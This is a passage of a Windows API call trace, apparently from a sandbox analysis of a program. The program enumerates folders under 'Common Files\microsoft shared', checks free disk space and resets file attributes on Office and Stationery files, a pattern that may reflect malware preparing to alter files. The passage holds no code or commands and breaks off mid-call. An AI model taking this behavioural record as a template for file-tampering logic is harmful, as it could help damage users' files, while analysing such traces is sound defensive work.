nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\journal.dll", lpFilePart=0x0) returned 0x44 [0112.997] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\micaut.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\micaut.dll", lpFilePart=0x0) returned 0x43 [0112.997] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll", lpFilePart=0x0) returned 0x4a [0112.997] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mip.exe", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mip.exe", lpFilePart=0x0) returned 0x40 [0112.997] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mraut.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mraut.dll", lpFilePart=0x0) returned 0x42 [0112.997] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwgst.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwgst.dll", lpFilePart=0x0) returned 0x44 [0112.998] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwLatin.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwLatin.dll", lpFilePart=0x0) returned 0x46 [0112.998] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penchs.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penchs.dll", lpFilePart=0x0) returned 0x43 [0112.998] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pencht.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pencht.dll", lpFilePart=0x0) returned 0x43 [0112.998] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penjpn.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penjpn.dll", lpFilePart=0x0) returned 0x43 [0112.998] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penkor.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penkor.dll", lpFilePart=0x0) returned 0x43 [0112.998] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penusa.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penusa.dll", lpFilePart=0x0) returned 0x43 [0112.998] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.dll", lpFilePart=0x0) returned 0x44 [0112.999] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.exe", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.exe", lpFilePart=0x0) returned 0x44 [0112.999] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipres.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipres.dll", lpFilePart=0x0) returned 0x43 [0112.999] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\rtscom.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\rtscom.dll", lpFilePart=0x0) returned 0x43 [0112.999] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchobj.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchobj.dll", lpFilePart=0x0) returned 0x44 [0112.999] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchui.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchui.dll", lpFilePart=0x0) returned 0x43 [0112.999] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\TabTip32.exe", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\TabTip32.exe", lpFilePart=0x0) returned 0x45 [0113.000] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tiptsf.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tiptsf.dll", lpFilePart=0x0) returned 0x43 [0113.000] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tpcps.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tpcps.dll", lpFilePart=0x0) returned 0x42 [0113.000] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa21d9876, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa21d9876, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0113.004] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0113.004] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0113.004] CoTaskMemFree (pv=0x508980) [0113.004] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0113.004] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x81305af3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x81305af3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0113.006] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x81305af3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x81305af3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0113.007] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0113.007] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0113.007] CoTaskMemFree (pv=0x508980) [0113.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0113.007] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x81305af3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x81305af3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0113.008] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x81305af3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x81305af3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0113.008] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0113.008] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0113.008] CoTaskMemFree (pv=0x508980) [0113.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0113.008] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xa21b3607, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa21b3607, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0113.011] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui", lpFilePart=0x0) returned 0x4d [0113.012] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui", lpFilePart=0x0) returned 0x4a [0113.012] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui", lpFilePart=0x0) returned 0x50 [0113.012] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui", lpFilePart=0x0) returned 0x4d [0113.012] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipBand.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipBand.dll.mui", lpFilePart=0x0) returned 0x4e [0113.012] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui", lpFilePart=0x0) returned 0x4d [0113.012] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui", lpFilePart=0x0) returned 0x4d [0113.013] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xa21b3607, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa21b3607, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0113.015] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0113.015] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0113.015] CoTaskMemFree (pv=0x508980) [0113.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0113.015] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa21d9876, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa060a95, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa21d9876, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0113.016] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\HWRCustomization\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\HWRCustomization\\", lpFilePart=0x0) returned 0x4a [0113.016] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa21d9876, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa060a95, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa21d9876, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0113.016] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0113.016] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0113.017] CoTaskMemFree (pv=0x508980) [0113.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0113.017] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x522b67d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x522b67d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x522b67d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0113.018] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x522b67d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x522b67d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x522b67d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0113.019] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0113.019] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0113.019] CoTaskMemFree (pv=0x508980) [0113.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0113.019] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x522b67d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x522b67d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x522b67d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0113.020] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x522b67d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x522b67d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x522b67d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0113.021] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0113.021] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0113.021] CoTaskMemFree (pv=0x508980) [0113.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0113.022] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0113.022] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0113.022] CoTaskMemFree (pv=0x508980) [0113.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0113.023] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0113.023] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0113.023] CoTaskMemFree (pv=0x508980) [0113.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0113.024] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0113.024] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0113.024] CoTaskMemFree (pv=0x508980) [0113.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0113.025] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0113.025] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0113.025] CoTaskMemFree (pv=0x508980) [0113.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0113.026] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0114.012] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Cultures\\OFFICE.ODF", dwFileAttributes=0x80) returned 1 [0114.015] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.015] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.015] CoTaskMemFree (pv=0x508980) [0114.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.016] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.016] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.016] CoTaskMemFree (pv=0x508980) [0114.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.017] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.017] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.018] CoTaskMemFree (pv=0x508980) [0114.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.018] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.018] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.018] CoTaskMemFree (pv=0x508980) [0114.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.027] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0114.031] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.htm", dwFileAttributes=0x80) returned 0 [0114.032] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0114.037] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.jpg", dwFileAttributes=0x80) returned 0 [0114.039] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0114.041] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Garden.htm", dwFileAttributes=0x80) returned 0 [0114.043] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0114.048] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Garden.jpg", dwFileAttributes=0x80) returned 0 [0114.049] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0114.052] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm", dwFileAttributes=0x80) returned 0 [0114.053] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0114.057] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg", dwFileAttributes=0x80) returned 0 [0114.058] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, 